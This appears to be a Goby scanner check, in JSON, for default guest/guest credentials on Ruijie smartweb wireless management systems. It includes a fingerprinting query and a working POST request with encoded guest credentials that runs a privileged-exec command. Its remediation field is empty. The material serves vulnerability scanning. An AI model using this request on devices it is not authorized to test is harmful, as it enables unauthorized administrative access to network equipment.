{ "Name": "Ruijie smartweb weak password", "Level": "1", "Tags": [ "弱口令" ], "GobyQuery": "app=\"Ruijie-WiFi\" && body=\"无线smartWeb--登录页面\"", "Description": "Ruijie smartweb management system opens the guest account vulnerability by default , and the attacker can log in to the background through the vulnerability to further attack (guest/guest)", "Product": "Ruijie smartweb", "Homepage": "http://www.ruijie.com.cn/", "Author": "PeiQi", "Impact": "

The attacker can log in to the background for further attack

", "Recommandation": "

undefined

", "References": [ "http://wiki.peiqi.tech" ], "ScanSteps": [ "AND", { "Request": { "method": "POST", "uri": "/WEB_VMS/LEVEL15/", "follow_redirect": false, "header": { "Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q=" }, "data_type": "text", "data": "command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant." }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "Level was: LEVEL15", "bz": "" } ] }, "SetVariable": [] } ], "PostTime": "2021-04-04 11:26:02", "GobyVersion": "1.8.255" }